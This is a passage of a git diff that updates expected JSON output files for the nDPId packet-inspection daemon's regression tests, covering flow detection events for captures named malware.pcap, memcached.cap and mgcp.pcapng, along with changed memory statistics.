-00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02462{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} 
+00912{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569579416636,"flow_last_seen":1569579416830,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569579416830,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569579416636,"flow_last_seen":1569579417029,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1569579417029,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+02462{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1569579416636,"flow_last_seen":1569579417030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4897,"flow_avg_l4_payload_len":489,"midstream":0,"thread_ts_msec":1569579417030,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.internetbadguys.com","server_names":"api.opendns.com,branded-login.opendns.com,cachecheck.opendns.com,community.opendns.com,dashboard2.opendns.com,dashboard.opendns.com,dashboard-ipv4.opendns.com,msp-login.opendns.com,api-ipv4.opendns.com,api-ipv6.opendns.com,authz.api.opendns.com,domain.opendns.com,help.vpn.opendns.com,ideabank.opendns.com,login.opendns.com,netgear.opendns.com,reseller-login.opendns.com,images.opendns.com,images-using.opendns.com,store.opendns.com,signup.opendns.com,twilio.opendns.com,updates.opendns.com,shared.opendns.com,tools.opendns.com,cache.opendns.com,api.umbrella.com,branded-login.umbrella.com,cachecheck.umbrella.com,community.umbrella.com,dashboard2.umbrella.com,dashboard.umbrella.com,dashboard-ipv4.umbrella.com,msp-login.umbrella.com,api-ipv4.umbrella.com,api-ipv6.umbrella.com,authz.api.umbrella.com,domain.umbrella.com,help.vpn.umbrella.com,ideabank.umbrella.com,login.umbrella.com,netgear.umbrella.com,reseller-login.umbrella.com,images.umbrella.com,images-using.umbrella.com,store.umbrella.com,signup.umbrella.com,twilio.umbrella.com,updates.umbrella.com,shared.umbrella.com,tools.umbrella.com,cache.umbrella.c
om","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"0c0aff9ccea5e7e1de5c3a0069d103f3","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=OpenDNS, Inc., CN=api.opendns.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"21:B4:CF:84:13:3A:21:A4:B0:02:63:76:39:84:EA:ED:27:EE:51:7C"}} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569571476362,"flow_last_seen":1569571476362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","src_port":33706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} -00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1569579416636,"flow_last_seen":1569579417280,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6018,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":35236,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.OpenDNS","breed":"Acceptable","category":"Network"}} +00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569571470672,"flow_last_seen":1569571470672,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"144.139.247.220","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 
00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569579408876,"flow_last_seen":1569579409087,"flow_idle_time":7580000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":186,"midstream":1,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"67.215.92.210","src_port":48394,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569571466977,"flow_last_seen":1569571467001,"flow_idle_time":200000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1569579417280,"l3_proto":"ip4","src_ip":"192.168.7.7","dst_ip":"1.1.1.1","src_port":42370,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":26,"source":"malware.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":26,"total-skipped-flows":0,"total-l4-payload-len":6587,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":4,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":5,"total-idle-flows":5,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1569579417280} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 26/26 @@ -37,9 +37,9 @@ ~~ total active/idle flows...: 5/5 ~~ total timeout flows.......: 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5913781 bytes -~~ total memory freed........: 5913781 bytes -~~ total allocations/frees...: 118219/118219 +~~ total memory allocated....: 6047415 bytes +~~ total memory freed........: 6047415 bytes +~~ total allocations/frees...: 120981/120981 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 2467 chars diff --git a/test/results/memcached.cap.out b/test/results/memcached.cap.out index 39f33e614..4f8a5534d 100644 --- a/test/results/memcached.cap.out +++ b/test/results/memcached.cap.out 
@@ -4,8 +4,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8pT5AAEAGl3t\/AAABfwAAAejUK8sskd7QAAAAAKACqqr+MAAAAgT\/1wQCCAopIHvuAAAAAAEDAwc="} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA8AABAAEAGPLp\/AAABfwAAASvL6NTLJnx6LJHe0aASqqr+MAAAAgT\/1wQCCAopIHvuKSB77gEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1534343745954,"pkt":"AAAAAAAAAAAAAAAACABFAAA0pT9AAEAGl4J\/AAABfwAAAejUK8sskd7RyyZ8e4AQAVb+KAAAAQEICikge+4pIHvu"} 
-00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} 
+00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1534343745954,"flow_last_seen":1534343745954,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1028,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1534343745954,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":59604,"dst_port":11211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Memcached","breed":"Acceptable","category":"Network"}} 00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"memcached.cap","alias":"nDPId-test","packets-captured":10,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":1035,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1534343745954} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 10/10 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871781 bytes -~~ total memory freed........: 5871781 bytes -~~ total allocations/frees...: 118125/118125 +~~ total memory allocated....: 6005415 bytes +~~ total memory freed........: 6005415 bytes +~~ total allocations/frees...: 120887/120887 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 688 chars diff --git a/test/results/mgcp.pcapng.out b/test/results/mgcp.pcapng.out index a40c20bd6..017be90ad 100644 
--- a/test/results/mgcp.pcapng.out +++ b/test/results/mgcp.pcapng.out 
@@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1463066849887} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463066849887,"flow_last_seen":1463066849887,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463066849887,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1463066849887,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1463066849887,"pkt":"AFBWWvA7AAtFuLlqCABFaABPAQAAAP4RztYKCuRICgr0Agl7CXsAO7a8UlNJUCAyNjI2NjIxMzQgKkB2ZzIyNCBNR0NQIDAuMQpSTTogZ3JhY2VmdWwKUkQ6IDAK"} 
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463066849887,"flow_last_seen":1463066849887,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463066849887,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463066849887,"flow_last_seen":1463066849887,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1463066849887,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1463066849888,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":57,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":57,"pkt_l4_len":23,"thread_ts_msec":1463066849888,"pkt":"AAtFuLlqAFBWWvA7CABFYAArAABAAEARTgMKCvQCCgrkSAl7CXsAF5QpMjAwIDI2MjY2MjEzNCAK"} 
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1463066853411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1463066853411,"pkt":"AFBWWvA7AAtFuLlqCABFaABIAAAAAP4Rz90KCuRICgr0Agl7CXsANBfXUlNJUCAyNjI2NjIxMzYgKkB2ZzIyNCBNR0NQIDAuMQpSTTogcmVzdGFydAo="} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1463066849887,"flow_last_seen":1463066856144,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":1160,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1463066856144,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"mgcp.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1463066849887,"flow_last_seen":1463066856144,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":804,"flow_tot_l4_payload_len":1160,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1463066856144,"l3_proto":"ip4","src_ip":"10.10.228.72","dst_ip":"10.10.244.2","src_port":2427,"dst_port":2427,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MGCP","breed":"Acceptable","category":"VoIP"}} 
